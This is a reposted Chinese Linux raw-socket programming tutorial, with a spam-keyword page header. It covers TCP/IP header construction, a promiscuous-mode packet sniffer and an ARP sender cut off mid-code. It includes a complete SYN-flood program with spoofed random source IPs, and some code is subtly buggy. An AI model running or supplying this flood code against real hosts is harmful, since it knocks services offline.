3atv精品不卡视频,97人人超碰国产精品最新,中文字幕av一区二区三区人妻少妇,久久久精品波多野结衣,日韩一区二区三区精品

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 运维知识 > linux >内容正文

linux

Linux原始套接字学习总结

發(fā)布時(shí)間:2025/4/14 linux 20 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Linux原始套接字学习总结 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

?Linux網(wǎng)絡(luò)編程:原始套接字的魔力【上】

http://blog.chinaunix.net/uid-23069658-id-3280895.html


基于原始套接字編程
? ? ? ?在開發(fā)面向連接的TCP和面向無連接的UDP程序時(shí),我們所關(guān)心的核心問題在于數(shù)據(jù)收發(fā)層面,數(shù)據(jù)的傳輸特性由TCP或UDP來保證:


? ? ? ?也就是說,對于TCP或UDP的程序開發(fā),焦點(diǎn)在Data字段,我們沒法直接對TCP或UDP頭部字段進(jìn)行赤裸裸的修改,當(dāng)然還有IP頭。換句話說,我們對它們頭部操作的空間非常受限,只能使用它們已經(jīng)開放給我們的諸如源、目的IP,源、目的端口等等。
? ? ? ?今天我們討論一下原始套接字的程序開發(fā),用它作為入門協(xié)議棧的進(jìn)階跳板太合適不過了。OK閑話不多說,進(jìn)入正題。
? ? ? ?原始套接字的創(chuàng)建方法也不難:socket(AF_INET, SOCK_RAW, protocol)。
? ? ? ?重點(diǎn)在protocol字段,這里就不能簡單的將其值為0了。在頭文件netinet/in.h中定義了系統(tǒng)中該字段目前能取的值,注意:有些系統(tǒng)中不一定實(shí)現(xiàn)了netinet/in.h中的所有協(xié)議。源代碼的linux/in.h中和netinet/in.h中的內(nèi)容一樣。


? ? ? ?我們常見的有IPPROTO_TCP,IPPROTO_UDP和IPPROTO_ICMP,在博文“(十六)洞悉linux下的Netfilter&iptables:開發(fā)自己的hook函數(shù)【實(shí)戰(zhàn)】(下) ”中我們見到該protocol字段為IPPROTO_RAW時(shí)的情形,后面我們會(huì)詳細(xì)介紹。
? ? ? ?用這種方式我就可以得到原始的IP包了,然后就可以自定義IP所承載的具體協(xié)議類型,如TCP,UDP或ICMP,并手動(dòng)對每種承載在IP協(xié)議之上的報(bào)文進(jìn)行填充。接下來我們看個(gè)最著名的例子DOS攻擊的示例代碼,以便大家更好的理解如何基于原始套接字手動(dòng)去封裝我們所需要TCP報(bào)文。
? ? ? ?先簡單復(fù)習(xí)一下TCP報(bào)文的格式,因?yàn)槲覀儽旧聿皇侵v協(xié)議的設(shè)計(jì)思想,所以只會(huì)提及和我們接下來主題相關(guān)的字段,如果想對TCP協(xié)議原理進(jìn)行深入了解那么《TCP/IP詳解卷1》無疑是最好的選擇。


? ? ? ?我們目前主要關(guān)注上面著色部分的字段就OK了,接下來再看看TCP3次握手的過程。TCP的3次握手的一般流程是:
(1) 第一次握手:建立連接時(shí),客戶端A發(fā)送SYN包(SEQ_NUMBER=j)到服務(wù)器B,并進(jìn)入SYN_SEND狀態(tài),等待服務(wù)器B確認(rèn)。
(2) 第二次握手:服務(wù)器B收到SYN包,必須確認(rèn)客戶A的SYN(ACK_NUMBER=j+1),同時(shí)自己也發(fā)送一個(gè)SYN包(SEQ_NUMBER=k),即SYN+ACK包,此時(shí)服務(wù)器B進(jìn)入SYN_RECV狀態(tài)。
(3) 第三次握手:客戶端A收到服務(wù)器B的SYN+ACK包,向服務(wù)器B發(fā)送確認(rèn)包ACK(ACK_NUMBER=k+1),此包發(fā)送完畢,客戶端A和服務(wù)器B進(jìn)入ESTABLISHED狀態(tài),完成三次握手。
?至此3次握手結(jié)束,TCP通路就建立起來了,然后客戶端與服務(wù)器開始交互數(shù)據(jù)。上面描述過程中,SYN包表示TCP數(shù)據(jù)包的標(biāo)志位syn=1,同理,ACK表示TCP報(bào)文中標(biāo)志位ack=1,SYN+ACK表示標(biāo)志位syn=1和ack=1同時(shí)成立。
原始套接字還提供了一個(gè)非常有用的參數(shù)IP_HDRINCL:
1、當(dāng)開啟該參數(shù)時(shí):我們可以從IP報(bào)文首部第一個(gè)字節(jié)開始依次構(gòu)造整個(gè)IP報(bào)文的所有選項(xiàng),但是IP報(bào)文頭部中的標(biāo)識字段(設(shè)置為0時(shí))和IP首部校驗(yàn)和字段總是由內(nèi)核自己維護(hù)的,不需要我們關(guān)心。
2、如果不開啟該參數(shù):我們所構(gòu)造的報(bào)文是從IP首部之后的第一個(gè)字節(jié)開始,IP首部由內(nèi)核自己維護(hù),首部中的協(xié)議字段被設(shè)置成調(diào)用socket()函數(shù)時(shí)我們所傳遞給它的第三個(gè)參數(shù)。
?開啟IP_HDRINCL特性的模板代碼一般為:
? ? ? ?const int on =1;
? if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0){
printf("setsockopt error!\n");
? }
? ? ? 所以,我們還得復(fù)習(xí)一下IP報(bào)文的首部格式:


?同樣,我們重點(diǎn)關(guān)注IP首部中的著色部分區(qū)段的填充情況。
? ? ? ?有了上面的知識做鋪墊,接下來DOS示例代碼的編寫就相當(dāng)簡單了。我們來體驗(yàn)一下手動(dòng)構(gòu)造原生態(tài)IP報(bào)文的樂趣吧:
點(diǎn)擊(此處)折疊或打開
//mdos.c
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <linux/tcp.h>


//我們自己寫的攻擊函數(shù)
void attack(int skfd,struct sockaddr_in *target,unsigned short srcport);
//如果什么都讓內(nèi)核做,那豈不是忒不爽了,咱也試著計(jì)算一下校驗(yàn)和。
unsigned short check_sum(unsigned short *addr,int len);


int main(int argc,char** argv){
? ? ? ? int skfd;
? ? ? ? struct sockaddr_in target;
? ? ? ? struct hostent *host;
? ? ? ? const int on=1;
? ? ? ? unsigned short srcport;


? ? ? ? if(argc!=2)
? ? ? ? {
? ? ? ? ? ? ? ? printf("Usage:%s target dstport srcport\n",argv[0]);
? ? ? ? ? ? ? ? exit(1);
? ? ? ? }


? ? ? ? bzero(&target,sizeof(struct sockaddr_in));
? ? ? ? target.sin_family=AF_INET;
? ? ? ? target.sin_port=htons(atoi(argv[2]));


? ? ? ? if(inet_aton(argv[1],&target.sin_addr)==0)
? ? ? ? {
? ? ? ? ? ? ? ? host=gethostbyname(argv[1]);
? ? ? ? ? ? ? ? if(host==NULL)
? ? ? ? ? ? ? ? {
? ? ? ? ? ? ? ? ? ? ? ? printf("TargetName Error:%s\n",hstrerror(h_errno));
? ? ? ? ? ? ? ? ? ? ? ? exit(1);
? ? ? ? ? ? ? ? }
? ? ? ? ? ? ? ? target.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
? ? ? ? }


? ? ? ? //將協(xié)議字段置為IPPROTO_TCP,來創(chuàng)建一個(gè)TCP的原始套接字
? ? ? ? if(0>(skfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))){
? ? ? ? ? ? ? ? perror("Create Error");
? ? ? ? ? ? ? ? exit(1);
? ? ? ? }


? ? ? ? //用模板代碼來開啟IP_HDRINCL特性,我們完全自己手動(dòng)構(gòu)造IP報(bào)文
? ? ? ? ?if(0>setsockopt(skfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))){
? ? ? ? ? ? ? ? perror("IP_HDRINCL failed");
? ? ? ? ? ? ? ? exit(1);
? ? ? ? }


? ? ? ? //因?yàn)橹挥衦oot用戶才可以play with raw socket :)
? ? ? ? setuid(getpid());
? ? ? ? srcport = atoi(argv[3]);
? ? ? ? attack(skfd,&target,srcport);
}


//在該函數(shù)中構(gòu)造整個(gè)IP報(bào)文,最后調(diào)用sendto函數(shù)將報(bào)文發(fā)送出去
void attack(int skfd,struct sockaddr_in *target,unsigned short srcport){
? ? ? ? char buf[128]={0};
? ? ? ? struct ip *ip;
? ? ? ? struct tcphdr *tcp;
? ? ? ? int ip_len;


? ? ? ? //在我們TCP的報(bào)文中Data沒有字段,所以整個(gè)IP報(bào)文的長度
? ? ? ? ip_len = sizeof(struct ip)+sizeof(struct tcphdr);
? ? ? ? //開始填充IP首部
? ? ? ? ip=(struct ip*)buf;


? ? ? ? ip->ip_v = IPVERSION;
? ? ? ? ip->ip_hl = sizeof(struct ip)>>2;
? ? ? ? ip->ip_tos = 0;
? ? ? ? ip->ip_len = htons(ip_len);
? ? ? ? ip->ip_id=0;
? ? ? ? ip->ip_off=0;
? ? ? ? ip->ip_ttl=MAXTTL;
? ? ? ? ip->ip_p=IPPROTO_TCP;
? ? ? ? ip->ip_sum=0;
? ? ? ? ip->ip_dst=target->sin_addr;


? ? ? ? //開始填充TCP首部
? ? ? ? tcp = (struct tcphdr*)(buf+sizeof(struct ip));
? ? ? ? tcp->source = htons(srcport);
? ? ? ? tcp->dest = target->sin_port;
? ? ? ? tcp->seq = random();
? ? ? ? tcp->doff = 5;
? ? ? ? tcp->syn = 1;
? ? ? ? tcp->check = 0;


? ? ? ? while(1){
? ? ? ? ? ? ? ? //源地址偽造,我們隨便任意生成個(gè)地址,讓服務(wù)器一直等待下去
? ? ? ? ? ? ? ? ip->ip_src.s_addr = random();
? ? ? ? ? ? ? ? tcp->check=check_sum((unsigned short*)tcp,sizeof(struct tcphdr));
? ? ? ? ? ? ? ? sendto(skfd,buf,ip_len,0,(struct sockaddr*)target,sizeof(struct sockaddr_in));
? ? ? ? }
}


//關(guān)于CRC校驗(yàn)和的計(jì)算,網(wǎng)上一大堆,我就“拿來主義”了
unsigned short check_sum(unsigned short *addr,int len){
? ? ? ? register int nleft=len;
? ? ? ? register int sum=0;
? ? ? ? register short *w=addr;
? ? ? ? short answer=0;


? ? ? ? while(nleft>1)
? ? ? ? {
? ? ? ? ? ? ? ? sum+=*w++;
? ? ? ? ? ? ? ? nleft-=2;
? ? ? ? }
? ? ? ? if(nleft==1)
? ? ? ? {
? ? ? ? ? ? ? ? *(unsigned char *)(&answer)=*(unsigned char *)w;
? ? ? ? ? ? ? ? sum+=answer;
? ? ? ? }


? ? ? ? sum=(sum>>16)+(sum&0xffff);
? ? ? ? sum+=(sum>>16);
? ? ? ? answer=~sum;
? ? ? ? return(answer);
}
? ? ? ?用前面我們自己編寫TCP服務(wù)器端程序來做本地測試,看看效果。先把服務(wù)器端程序啟動(dòng)起來,如下:


? ? ? ?然后,我們編寫的“搗蛋”程序登場了:


? ? ? ?該“mdos”命令執(zhí)行一段時(shí)間后,服務(wù)器端的輸出如下:


? ? ? ?因?yàn)槲覀兊脑碔P地址是隨機(jī)生成的,源端口固定為8888,服務(wù)器端收到我們的SYN報(bào)文后,會(huì)為其分配一條連接資源,并將該連接的狀態(tài)置為SYN_RECV,然后給客戶端回送一個(gè)確認(rèn),并要求客戶端再次確認(rèn),可我們卻不再bird別個(gè)了,這樣就會(huì)造成服務(wù)端一直等待直到超時(shí)。
? ? ? ?備注:本程序僅供交流分享使用,不要做惡,不然后果自負(fù)哦。
? ? ? ?最后補(bǔ)充一點(diǎn),看到很多新手經(jīng)常對struct ip{}和struct iphdr{},struct icmp{}和struct icmphdr{}糾結(jié)來糾結(jié)去了,不知道何時(shí)該用哪個(gè)。在/usr/include/netinet目錄這些結(jié)構(gòu)所屬頭文件的定義,頭文件中對這些結(jié)構(gòu)也做了很明確的說明,這里我們簡單總結(jié)一下:
? ? ? ?struct ip{}、struct icmp{}是供BSD系統(tǒng)層使用,struct iphdr{}和struct icmphdr{}是在INET層調(diào)用。同理tcphdr和udphdr分別都已經(jīng)和諧統(tǒng)一了,參見tcp.h和udp.h。
? ? ? ?BSD和INET的解釋在協(xié)議棧篇章詳細(xì)論述,這里大家可以簡單這樣來理解:我們在用戶空間的編寫網(wǎng)絡(luò)應(yīng)用程序的層次就叫做BSD層。所以我們該用什么樣的數(shù)據(jù)結(jié)構(gòu)呢?良好的編程習(xí)慣當(dāng)然是BSD層推薦我們使用的,struct ip{}、struct icmp{}。至于INET層的兩個(gè)同類型的結(jié)構(gòu)體struct iphdr{}和struct icmphdr{}能用不?我只能說不建議??磦€(gè)例子:


?我們可以看到無論BSD還是INET層的IP數(shù)據(jù)包結(jié)構(gòu)體大小是相等的,ICMP報(bào)文的大小有差異。而我們知道ICMP報(bào)頭應(yīng)該是8字節(jié),那么BSD層為什么是28字節(jié)呢?留給大家思考。也就是說,我們這個(gè)mdos.c的實(shí)例程序中除了用struct ip{}之外還可以用INET層的struct iphdr{}結(jié)構(gòu)。將如下代碼:
點(diǎn)擊(此處)折疊或打開
struct ip *ip;

ip=(struct ip*)buf;
ip->ip_v = IPVERSION;
ip->ip_hl = sizeof(struct ip)>>2;
ip->ip_tos = 0;
ip->ip_len = htons(ip_len);
ip->ip_id=0;
ip->ip_off=0;
ip->ip_ttl=MAXTTL;
ip->ip_p=IPPROTO_TCP;
ip->ip_sum=0;
ip->ip_dst=target->sin_addr;

ip->ip_src.s_addr = random();
改成:
點(diǎn)擊(此處)折疊或打開
struct iphdr *ip;

ip=(struct iphdr*)buf;
ip->version = IPVERSION;
ip->ihl = sizeof(struct ip)>>2;
ip->tos = 0;
ip->tot_len = htons(ip_len);
ip->id=0;
ip->frag_off=0;
ip->ttl=MAXTTL;
ip->protocol=IPPROTO_TCP;
ip->check=0;
ip->daddr=target->sin_addr.s_addr;

ip->saddr = random();
? ? ? ?結(jié)果請童鞋們自己驗(yàn)證。雖然結(jié)果一樣,但在BSD層直接使用INET層的數(shù)據(jù)結(jié)構(gòu)還是不被推薦的。
? ? ? ?小結(jié):
? ? ? ?1、IP_HDRINCL選項(xiàng)可以使我們控制到底是要從IP頭部第一個(gè)字節(jié)開始構(gòu)造我們的原始報(bào)文或者從IP頭部之后第一個(gè)數(shù)據(jù)字節(jié)開始。
? ? ? ?2、只有超級用戶才能創(chuàng)建原始套接字。
? ? ? ?3、原始套接字上也可以調(diào)用connet、bind之類的函數(shù),但都不常見。原因請大家回顧一下這兩個(gè)函數(shù)的作用。想不起來的童鞋回頭復(fù)習(xí)一下前兩篇的內(nèi)容吧。
========

?Linux網(wǎng)絡(luò)編程:原始套接字的魔力【下】



可以接收鏈路層MAC幀的原始套接字
? ? ? ?前面我們介紹過了通過原始套接字socket(AF_INET, SOCK_RAW, protocol)我們可以直接實(shí)現(xiàn)自行構(gòu)造整個(gè)IP報(bào)文,然后對其收發(fā)。提醒一點(diǎn),在用這種方式構(gòu)造原始IP報(bào)文時(shí),第三個(gè)參數(shù)protocol不能用IPPROTO_IP,這樣會(huì)讓系統(tǒng)疑惑,不知道該用什么協(xié)議來伺候你了。
? ? ? ?今天我們介紹原始套接字的另一種用法:直接從鏈路層收發(fā)數(shù)據(jù)幀,聽起來好像很神奇的樣子。在Linux系統(tǒng)中要從鏈路層(MAC)直接收發(fā)數(shù)幀,比較普遍的做法就是用libpcap和libnet兩個(gè)動(dòng)態(tài)庫來實(shí)現(xiàn)。但今天我們就要用原始套接字來實(shí)現(xiàn)這個(gè)功能。


? ? ? ?這里的2字節(jié)幀類型用來指示該數(shù)據(jù)幀所承載的上層協(xié)議是IP、ARP或其他。
? ? ? ?為了實(shí)現(xiàn)直接從鏈路層收發(fā)數(shù)據(jù)幀,我們要用到原始套接字的如下形式:
?socket(PF_PACKET, type, protocol)
1、其中type字段可取SOCK_RAW或SOCK_DGRAM。它們兩個(gè)都使用一種與設(shè)備無關(guān)的標(biāo)準(zhǔn)物理層地址結(jié)構(gòu)struct sockaddr_ll{},但具體操作的報(bào)文格式不同:
SOCK_RAW:直接向網(wǎng)絡(luò)硬件驅(qū)動(dòng)程序發(fā)送(或從網(wǎng)絡(luò)硬件驅(qū)動(dòng)程序接收)沒有任何處理的完整數(shù)據(jù)報(bào)文(包括物理幀的幀頭),這就要求我們必須了解對應(yīng)設(shè)備的物理幀幀頭結(jié)構(gòu),才能正確地裝載和分析報(bào)文。也就是說我們用這種套接字從網(wǎng)卡驅(qū)動(dòng)上收上來的報(bào)文包含了MAC頭部,如果我們要用這種形式的套接字直接向網(wǎng)卡發(fā)送數(shù)據(jù)幀,那么我們必須自己組裝我們MAC頭部。這正符合我們的需求。
SOCK_DGRAM:這種類型的套接字對于收到的數(shù)據(jù)報(bào)文的物理幀幀頭會(huì)被系統(tǒng)自動(dòng)去掉,然后再將其往協(xié)議棧上層傳遞;同樣地,在發(fā)送時(shí)數(shù)據(jù)時(shí),系統(tǒng)將會(huì)根據(jù)sockaddr_ll結(jié)構(gòu)中的目的地址信息為數(shù)據(jù)報(bào)文添加一個(gè)合適的MAC幀頭。
2、protocol字段,常見的,一般情況下該字段取ETH_P_IP,ETH_P_ARP,ETH_P_RARP或ETH_P_ALL,當(dāng)然鏈路層協(xié)議很多,肯定不止我們說的這幾個(gè),但我們一般只關(guān)心這幾個(gè)就夠我們用了。這里簡單提一下網(wǎng)絡(luò)數(shù)據(jù)收發(fā)的一點(diǎn)基礎(chǔ)。協(xié)議棧在組織數(shù)據(jù)收發(fā)流程時(shí)需要處理好兩個(gè)方面的問題:“從上倒下”,即數(shù)據(jù)發(fā)送的任務(wù);“從下到上”,即數(shù)據(jù)接收的任務(wù)。數(shù)據(jù)發(fā)送相對接收來說要容易些,因?yàn)閷τ跀?shù)據(jù)接收而言,網(wǎng)卡驅(qū)動(dòng)還要明確什么樣的數(shù)據(jù)該接收、什么樣的不該接收等問題。protocol字段可選的四個(gè)值及其意義如下:
protocol

作用
ETH_P_IP
0X0800
只接收發(fā)往目的MAC是本機(jī)的IP類型的數(shù)據(jù)幀
ETH_P_ARP
0X0806
只接收發(fā)往目的MAC是本機(jī)的ARP類型的數(shù)據(jù)幀
ETH_P_RARP
0X8035
只接受發(fā)往目的MAC是本機(jī)的RARP類型的數(shù)據(jù)幀
ETH_P_ALL
0X0003
接收發(fā)往目的MAC是本機(jī)的所有類型(ip,arp,rarp)的數(shù)據(jù)幀,同時(shí)還可以接收從本機(jī)發(fā)出去的所有數(shù)據(jù)幀。在混雜模式打開的情況下,還會(huì)接收到發(fā)往目的MAC為非本地硬件地址的數(shù)據(jù)幀。
? ? ? protocol字段可取的所有協(xié)議參見/usr/include/linux/if_ether.h頭文件里的定義。
? ? ? 最后,格外需要留心一點(diǎn)的就是,發(fā)送數(shù)據(jù)的時(shí)候需要自己組織整個(gè)以太網(wǎng)數(shù)據(jù)幀。和地址相關(guān)的結(jié)構(gòu)體就不能再用前面的struct sockaddr_in{}了,而是struct sockaddr_ll{},如下:
點(diǎn)擊(此處)折疊或打開
struct sockaddr_ll{?
? ? unsigned short sll_family; /* 總是 AF_PACKET */?
? ? unsigned short sll_protocol; /* 物理層的協(xié)議 */?
? ? int sll_ifindex; /* 接口號 */?
? ? unsigned short sll_hatype; /* 報(bào)頭類型 */?
? ? unsigned char sll_pkttype; /* 分組類型 */?
? ? unsigned char sll_halen; /* 地址長度 */?
? ? unsigned char sll_addr[8]; /* 物理層地址 */?
};
?sll_protocoll:取值在linux/if_ether.h中,可以指定我們所感興趣的二層協(xié)議;
? ? ? ?sll_ifindex:置為0表示處理所有接口,對于單網(wǎng)卡的機(jī)器就不存在“所有”的概念了。如果你有多網(wǎng)卡,該字段的值一般通過ioctl來搞定,模板代碼如下,如果我們要獲取eth0接口的序號,可以使用如下代碼來獲取:
點(diǎn)擊(此處)折疊或打開
struct ?sockaddr_ll ?sll;
struct ifreq ifr;


strcpy(ifr.ifr_name, "eth0");
ioctl(sockfd, SIOCGIFINDEX, &ifr);
sll.sll_ifindex = ifr.ifr_ifindex;
? sll_hatype:ARP硬件地址類型,定義在 linux/if_arp.h 中。 取ARPHRD_ETHER時(shí)表示為以太網(wǎng)。
? sll_pkttype:包含分組類型。目前,有效的分組類型有:目標(biāo)地址是本地主機(jī)的分組用的 PACKET_HOST,物理層廣播分組用的 PACKET_BROADCAST ,發(fā)送到一個(gè)物理層多路廣播地址的分組用的 PACKET_MULTICAST,在混雜(promiscuous)模式下的設(shè)備驅(qū)動(dòng)器發(fā)向其他主機(jī)的分組用的 PACKET_OTHERHOST,源于本地主機(jī)的分組被環(huán)回到分組套接口用的 PACKET_OUTGOING。這些類型只對接收到的分組有意義。
? ? ? ?sll_addr和sll_halen指示物理層(如以太網(wǎng),802.3,802.4或802.5等)地址及其長度,嚴(yán)格依賴于具體的硬件設(shè)備。類似于獲取接口索引sll_ifindex,要獲取接口的物理地址,可以采用如下代碼:
點(diǎn)擊(此處)折疊或打開
struct ifreq ifr;


strcpy(ifr.ifr_name, "eth0");
ioctl(sockfd, SIOCGIFHWADDR, &ifr);
?缺省情況下,從任何接口收到的符合指定協(xié)議的所有數(shù)據(jù)報(bào)文都會(huì)被傳送到原始PACKET套接字口,而使用bind系統(tǒng)調(diào)用并以一個(gè)sochddr_ll結(jié)構(gòu)體對象將PACKET套接字與某個(gè)網(wǎng)絡(luò)接口相綁定,就可使我們的PACKET原始套接字只接收指定接口的數(shù)據(jù)報(bào)文。?
?接下來我們簡單介紹一下網(wǎng)卡是怎么收報(bào)的,如果你對這部分已經(jīng)很了解可以跳過這部分內(nèi)容。網(wǎng)卡從線路上收到信號流,網(wǎng)卡的驅(qū)動(dòng)程序會(huì)去檢查數(shù)據(jù)幀開始的前6個(gè)字節(jié),即目的主機(jī)的MAC地址,如果和自己的網(wǎng)卡地址一致它才會(huì)接收這個(gè)幀,不符合的一般都是直接無視。然后該數(shù)據(jù)幀會(huì)被網(wǎng)絡(luò)驅(qū)動(dòng)程序分解,IP報(bào)文將通過網(wǎng)絡(luò)協(xié)議棧,最后傳送到應(yīng)用程序那里。往上層傳遞的過程就是一個(gè)校驗(yàn)和“剝頭”的過程,由協(xié)議棧各層去實(shí)現(xiàn)。


? ? ? ?接下來我們來寫個(gè)簡單的抓包程序,將那些發(fā)給本機(jī)的IPv4報(bào)文全打印出來:
點(diǎn)擊(此處)折疊或打開
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>


int main(int argc, char **argv) {
? ?int sock, n;
? ?char buffer[2048];
? ?struct ethhdr *eth;
? ?struct iphdr *iph;


? ?if (0>(sock=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP)))) {
? ? ?perror("socket");
? ? ?exit(1);
? ?}


? ?while (1) {
? ? ?printf("=====================================\n");
? ? ?//注意:在這之前我沒有調(diào)用bind函數(shù),原因是什么呢?
? ? ?n = recvfrom(sock,buffer,2048,0,NULL,NULL);
? ? ?printf("%d bytes read\n",n);


? ? ?//接收到的數(shù)據(jù)幀頭6字節(jié)是目的MAC地址,緊接著6字節(jié)是源MAC地址。
? ? ?eth=(struct ethhdr*)buffer;
? ? ?printf("Dest MAC addr:%02x:%02x:%02x:%02x:%02x:%02x\n",eth->h_dest[0],eth->h_dest[1],eth->h_dest[2],eth->h_dest[3],eth->h_dest[4],eth->h_dest[5]);
? ? ?printf("Source MAC addr:%02x:%02x:%02x:%02x:%02x:%02x\n",eth->h_source[0],eth->h_source[1],eth->h_source[2],eth->h_source[3],eth->h_source[4],eth->h_source[5]);


? ? ?iph=(struct iphdr*)(buffer+sizeof(struct ethhdr));
? ? ?//我們只對IPV4且沒有選項(xiàng)字段的IPv4報(bào)文感興趣
? ? ?if(iph->version ==4 && iph->ihl == 5){
? ? ? ? ? ? ?printf("Source host:%s\n",inet_ntoa(iph->saddr));
? ? ? ? ? ? ?printf("Dest host:%s\n",inet_ntoa(iph->daddr));
? ? ?}
? ?}
}
? ? ? 編譯,然后運(yùn)行,要以root身份才可以運(yùn)行該程序:


正如我們前面看到的,網(wǎng)卡丟棄所有不含有主機(jī)MAC地址00:0C:29:BA:CB:61的數(shù)據(jù)包,這是因?yàn)榫W(wǎng)卡處于非混雜模式,即每個(gè)網(wǎng)卡只處理源地址是它自己的幀!
這里有三個(gè)例外的情況:
1、如果一個(gè)幀的目的MAC地址是一個(gè)受限的廣播地址(255.255.255.255)那么它將被所有的網(wǎng)卡接收。
2、如果一個(gè)幀的目的地址是組播地址,那么它將被那些打開組播接收功能的網(wǎng)卡所接收。
3、網(wǎng)卡如被設(shè)置成混雜模式,那么它將接收所有流經(jīng)它的數(shù)據(jù)包。
? ? ? ?前面我們剛好提到過網(wǎng)卡的混雜模式,現(xiàn)在我們就來迫不及待的實(shí)踐一哈看看混雜模式是否可以讓我們抓到所有數(shù)據(jù)包,只要在while循環(huán)前加上如下代碼就OK了:


點(diǎn)擊(此處)折疊或打開
struct ifreq ethreq;
… …
strncpy(ethreq.ifr_name,"eth0",IFNAMSIZ);
if(-1 == ioctl(sock,SIOCGIFFLAGS,&ethreq)){
? ? ?perror("ioctl");
? ? ?close(sock);
? ? ?exit(1);
}
ethreq.ifr_flags |=IFF_PROMISC;
if(-1 == ioctl(sock,SIOCGIFFLAGS,&ethreq)){
? ? ?perror("ioctl");
? ? ?close(sock);
? ? ?exit(1);
}
while(1){
? ?… …
}
? ? ? ?至此,我們一個(gè)網(wǎng)絡(luò)抓包工具的雛形就出現(xiàn)了。大家可以基于此做更多的練習(xí),加上多線程機(jī)制,對收到的不同類型的數(shù)據(jù)包做不同處理等等,反正由你發(fā)揮的空間是相當(dāng)?shù)未?#xff0c;“狐貍未成精,只因太年輕”。把這塊吃透了,后面理解協(xié)議棧就會(huì)相當(dāng)輕松。
========

?Linux網(wǎng)絡(luò)編程:原始套接字的魔力【續(xù)



如何從鏈路層直接發(fā)送數(shù)據(jù)幀
? ? ? ?本來以為這部分都弄完了,結(jié)果有朋友反映說看了半天還是沒看到如何從鏈路層直接發(fā)送數(shù)據(jù)。因?yàn)樯弦黄锩嫣岬降氖菑逆溌穼印笆瞻l(fā)”數(shù)據(jù),結(jié)果只“收”完,忘了“發(fā)”,實(shí)在抱歉,所以就有這篇續(xù)出來了。
? ? ? ?上一節(jié)我們主要研究了如何從鏈路層直接接收數(shù)據(jù)幀,可以通過bind函數(shù)來將原始套接字綁定到本地一個(gè)接口上,然后該套接字就只接收從該接口收上來的對應(yīng)的數(shù)據(jù)包。今天我們用原始套接字來手工實(shí)現(xiàn)鏈路層ARP報(bào)文的發(fā)送和接收,以便大家對原始套接字有更深刻的掌握和理解。
? ? ? ?ARP全稱為地址解析協(xié)議,是鏈路層廣泛使用的一種尋址協(xié)議,完成32比特IP地址到48比特MAC地址的映射轉(zhuǎn)換。在以太網(wǎng)中,當(dāng)一臺主機(jī)需要向另外一臺主機(jī)發(fā)送消息時(shí),它會(huì)首先在自己本地的ARP緩存表中根據(jù)目的主機(jī)的IP地址查找其對應(yīng)的MAC地址,如果找到了則直接向其發(fā)送消息。如果未找到,它首先會(huì)在全網(wǎng)發(fā)送一個(gè)ARP廣播查詢,這個(gè)查詢的消息會(huì)被以太網(wǎng)中所有主機(jī)接收到,然后每個(gè)主機(jī)就根據(jù)ARP查詢報(bào)文中所指定的IP地址來檢查該報(bào)文是不是發(fā)給自己的,如果不是則直接丟棄;只有被查詢的目的主機(jī)才會(huì)對這個(gè)消息進(jìn)行響應(yīng),然后將自己的MAC地址通告給發(fā)送者。
? ? ? ?也就是說,鏈路層中是根據(jù)MAC地址來確定唯一一臺主機(jī)。以太幀格式如下:


? ? ? ?以太幀首部中2字節(jié)的幀類型字段指定了其上層所承載的具體協(xié)議,常見的有0x0800表示是IP報(bào)文、0x0806表示RARP協(xié)議、0x0806即為我們將要討論的ARP協(xié)議。
?硬件類型: 1表示以太網(wǎng)。
?協(xié)議類型: 0x0800表示IP地址。和以太頭部中幀類型字段相同。
?硬件地址長度和協(xié)議地址長度:對于以太網(wǎng)中的ARP協(xié)議而言,分別為6和4;
?操作碼:1表示ARP請求;2表示ARP應(yīng)答;3表示RARP請求;4表示RARP應(yīng)答。
? ? ? ?我們這里只討論硬件地址為以太網(wǎng)地址、協(xié)議地址為IP地址的情形,所以剩下四個(gè)字段就分別表示發(fā)送方的MAC和IP地址、接收方的MAC和IP地址了。
? ? ? ?注意:對于一個(gè)ARP請求報(bào)文來說,除了接收方硬件地址外,其他字段都要填充。當(dāng)系統(tǒng)收到一個(gè)ARP請求時(shí),會(huì)查詢該請求報(bào)文中接收方的協(xié)議地址是否和自己的IP地址相等,如果相等,它就把自己的硬件地址和協(xié)議地址填充進(jìn)去,將發(fā)送和接收方的地址互換,然后將操作碼改為2,發(fā)送回去。


? ? ? ?下面看一個(gè)使用原始套接字發(fā)送ARP請求的例子:
點(diǎn)擊(此處)折疊或打開
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netpacket/packet.h>
#include <net/if.h>
#include <net/ethernet.h>


#define BUFLEN 42


int main(int argc,char** argv){
? ? int skfd,n;
? ? char buf[BUFLEN]={0};
? ? struct ether_header *eth;
? ? struct ether_arp *arp;
? ? struct sockaddr_ll toaddr;
? ? struct in_addr targetIP,srcIP;
? ? struct ifreq ifr;


? ? unsigned char src_mac[ETH_ALEN]={0};
? ? unsigned char dst_mac[ETH_ALEN]={0xff,0xff,0xff,0xff,0xff,0xff}; //全網(wǎng)廣播ARP請求
? ? if(3 != argc){
? ? ? ? ? ? printf("Usage: %s netdevName dstIP\n",argv[0]);
? ? ? ? ? ? exit(1);
? ? }


? ? if(0>(skfd=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ALL)))){
? ? ? ? ? ? perror("Create Error");
? ? ? ? ? ? exit(1);
? ? }


? ? bzero(&toaddr,sizeof(toaddr));
? ? bzero(&ifr,sizeof(ifr));
? ? strcpy(ifr.ifr_name,argv[1]);


? ? //獲取接口索引
